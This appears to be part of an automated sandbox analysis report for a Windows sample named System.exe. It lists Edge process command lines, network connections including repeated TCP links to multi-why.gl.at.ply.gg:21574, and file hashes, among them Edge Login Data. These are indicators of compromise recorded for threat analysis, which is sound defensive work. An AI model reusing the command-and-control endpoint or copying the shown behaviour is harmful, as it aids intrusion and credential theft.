"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2980 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2932 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4916 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5817474061165231349,4084809821981059940,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

C:\Users\Admin\System.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 multi-why.gl.at.ply.gg udp
US 147.185.221.19:21574 multi-why.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:21574 multi-why.gl.at.ply.gg tcp
US 147.185.221.19:21574 multi-why.gl.at.ply.gg tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 147.185.221.19:21574 multi-why.gl.at.ply.gg tcp
US 8.8.8.8:53 104.242.123.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 13.89.179.12:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 12.179.89.13.in-addr.arpa udp

Files

memory/4404-0-0x00000000006B0000-0x00000000006FA000-memory.dmp

memory/4404-1-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-2-0x000000001B420000-0x000000001B430000-memory.dmp

memory/1368-3-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/1368-4-0x0000025076CC0000-0x0000025076CE2000-memory.dmp

memory/1368-14-0x000002505DBE0000-0x000002505DBF0000-memory.dmp

memory/1368-15-0x000002505DBE0000-0x000002505DBF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izyw3gcm.1by.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1368-18-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/4856-30-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4856-31-0x00000222B7CB0000-0x00000222B7CC0000-memory.dmp

memory/4856-32-0x00000222B7CB0000-0x00000222B7CC0000-memory.dmp

memory/4856-34-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

memory/2852-45-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2852-46-0x0000025FAEB70000-0x0000025FAEB80000-memory.dmp

memory/2852-48-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3737c3eb5510d74c3d6ea770e9ff4ffb
SHA1 88148610a4f00560b06bc8607794d85f15bf3b64
SHA256 b716e0860cc27dd1035a125f44833c5999f4a0429635df6d97634f041b25effa
SHA512 db4db804933ab50bf56130a939040e33a57e4ec056c9e0c598bcae86bbaf093e2a22fd4ec8801f6b029985170f17859a931e63f28a7abb4f91780da2a33e1ebc

memory/4408-61-0x0000021CDAF90000-0x0000021CDAFA0000-memory.dmp

memory/4408-60-0x0000021CDAF90000-0x0000021CDAFA0000-memory.dmp

memory/4408-59-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4408-63-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-68-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-69-0x000000001B420000-0x000000001B430000-memory.dmp

memory/4404-70-0x0000000002B50000-0x0000000002B5C000-memory.dmp

C:\Users\Admin\System.exe

MD5 f278e2fb4010c8403c00cf988354a0fd
SHA1 3c1c63f2f6678cc55deda531413674c9f4b090cf
SHA256 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474
SHA512 85257af5832cb33de94d80544720ae91f2060b63513ddfac9698637531a5c1049dd37c22416fd0d624e6430be2f0c03d436ef4009cb2cab91c087169723da0b9

memory/2520-73-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2520-75-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/5012-79-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/5012-80-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4788-82-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4788-83-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2692-85-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/2692-86-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-87-0x000000001B480000-0x000000001B496000-memory.dmp

memory/3828-88-0x0000000000400000-0x0000000000410000-memory.dmp

memory/3828-89-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/3828-91-0x00000000053A0000-0x0000000005432000-memory.dmp

memory/3828-90-0x0000000005300000-0x000000000539C000-memory.dmp

memory/3828-92-0x00000000059F0000-0x0000000005F94000-memory.dmp

memory/3828-93-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/960-95-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/960-96-0x0000000004A30000-0x0000000004A40000-memory.dmp

memory/960-94-0x0000000004880000-0x00000000048B6000-memory.dmp

memory/960-97-0x0000000005070000-0x0000000005698000-memory.dmp

memory/960-98-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

memory/960-99-0x0000000005710000-0x0000000005776000-memory.dmp

memory/960-109-0x0000000005860000-0x0000000005BB4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

memory/960-111-0x0000000005E40000-0x0000000005E5E000-memory.dmp

memory/960-112-0x0000000005E70000-0x0000000005EBC000-memory.dmp

memory/960-115-0x0000000074FF0000-0x00000000757A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\CrashpadMetrics-active.pma

MD5 f9abba11224c1ad45bcdaa95e882842b
SHA1 1c8bfbcb53d611f72ccc9b80c04eb4a1e45a2400
SHA256 bb7428477de5d502b5414b3123ae7bcd5aeb61d37da8492318a9a6b45242884b
SHA512 90a9a486a505a44e012d49104f3d87954f3c729a800939cc9b127f283eafd841db8c019ba30b96ab2ebed0ce4226af2147417b41242de2dc2d600af119345926

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 e0811105475d528ab174dfdb69f935f3
SHA1 dd9689f0f70a07b4e6fb29607e42d2d5faf1f516
SHA256 c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c
SHA512 8374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State

MD5 8cd20f030c0e52c78f3b2d2bab082f29
SHA1 e924a0cf42468e929d7f50f43cb3d945b121c748
SHA256 298c4855b050a936057d26220ccae2e2ea0a99e352e7d61aa98b1232d954f90b
SHA512 cccbf4d26ae615c26bf22dc5b854b6e3d20669ece2f3ae09df32566c0b1de95f0cfc4a9da1d49cd2fdcf16e6f1905efcaa902188e3de8c8d90e1881738f4358f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Secure Preferences

MD5 c57eb69e85f77828ed87a40eae0f7add
SHA1 4124c4874e5f5383eca737dd26309cb81841352e
SHA256 c5ad6acae43eeb909035ffd0a9a61beb3d3fabbe6ef68eee89d389f5bb829d49
SHA512 3398ba1997fe673172b3241b916457adeb0372d1213b6b6fc618492ca725b1135251bb353d00cd101cc381bac5908229a2afdc8d0b1adcd076f1b6cb22e913ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Login Data

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Web Data

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sessions\Tabs_13353438338878948

MD5 7fcd0f5a1738a220266985ce13fe2239
SHA1 925674da29c597c38e117d947b2e2d5b1617fd2f
SHA256 9cfdfa688fb53570e065b6c5a8429c69b0e2c410d52cc686edeaf90676f7e04b
SHA512 7ebb1dd239920b630460da580c241ab2ecf08357025da2a40a89ed54d29675b0e99e88707c89d0a0d8af885204f90ff02caa7b42aac12b91adb6931275847240

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 47b2c6613360b818825d076d14c051f7
SHA1 7df7304568313a06540f490bf3305cb89bc03e5c
SHA256 47a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac
SHA512 08d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac

\??\pipe\LOCAL\crashpad_1932_ULJUGVYXBNEYDNLX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Favicons

MD5 71c47b8f44867d805fed290fb0a18f74
SHA1 a019b3329dd49f91ea94267f19de580c40c6ef67
SHA256 13daa8fe29d46fda8acd97cacd7baecc700b2a8763538709f8282941b629865c
SHA512 f35b779a06ef83496eb5adcd1ffeb20c144cc78ced2d923c5f87f9b9220b23c31a712b7518f691b58f65422a28b48ad569a43ee23936fa6445a9d8251a9658c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Visited Links

MD5 9109e330e97a971971eabc51e139e2a5
SHA1 1784be19cb2001025503165d0ca336eb3ed1d21a
SHA256 ec4fd5c50d2dab041a5e89bc4194f4adb3805cdcef8f3b6deb3e97e693b14957
SHA512 07af0a7d45ae1d0b828a29e4624f559ae65843e7c02a4ae4a83b20c9ec6783cf5ab2e51f15808dcc0da3e1ad60b0699e1b410f0a55b6ddaf0d8e2fa05e8fb5ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG

MD5 b2f6ddf5a9c8144d3eaa5718eeac56fe
SHA1 374b570d8e9ccab570788712a5d09ca6145b8616
SHA256 a285c90649277e792af2b94fd75687e9d02bee3a0cb65ca9407b20c2e8a68f79
SHA512 a12a0f8a8b0053f2f5c4f31972535b638ccfb029bbce910921a632dfcef3ee73d2aa7bb6f444ebe3977c8cc27230a26f0c4840223f12f48a1803dbb29d838b28

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG.old

MD5 7944ac4f945d91bf5d61e69475b18e4c
SHA1 81da808a01aaeb8144895b6ee9aac4359a27bc33
SHA256 e85b177c16c1ffee3747d60ff85ee1e57e1946f02796aa24e22944e2433e643b
SHA512 0af1141379fa833cc9dd58d6bf7f7f7664380688b0ff471a45ae020a92b41d4db270c0d847731a7fa872d03f23195aa5479c65f0b6e151a57dda537ac62c76b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8744fb59ea71b0a9603412deb911617a
SHA1 871f6a6a2ac14e5ce8cf9488495d052aca157e30
SHA256 2e971f0e8e5fc83611c30d3e1fd28a7a3b92cc87372670f3233609f1236ee293
SHA512 6d033ad15270bb08322d6c7efc594aeb1caf580290acce98f98b13637255ce5cfd945dde5aea4abdcf62d1d035cdf14947bcd02ceb71a35afc9dd381b79bfdf5

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG

MD5 a9a64bc193520c3c58f8f18654ae0570
SHA1 3bc0a66068838b3162752eeed9dc88d64dd72cc6
SHA256 828d60475300c86f91cf31d815ac64109d6d41eea1968f842cde3f0918e1ceb5
SHA512 827f6c104ec95e21fb630fcc338f96bef4f800bcb3919de300b3495e1908f661abc37fc3453108180b426fb9e299bece8faa40367cb9edc23d355303fc963072

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG.old

MD5 fc721d46610716d6035eebc1ec5339e8
SHA1 5fb55b017a44d9e3a43b2c36d34628de053c6f3d
SHA256 18812c1340dbf604777237f6022008e60e3b65aa1f1686d43a9d75a83a56a8fd
SHA512 8e79d120afea8d958d10c611742d73b40ebb0dfd77aac6617de5420117f33a993133ca76a0e89c40670163e40d71dad100029e692db26188b497923ed06af73b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

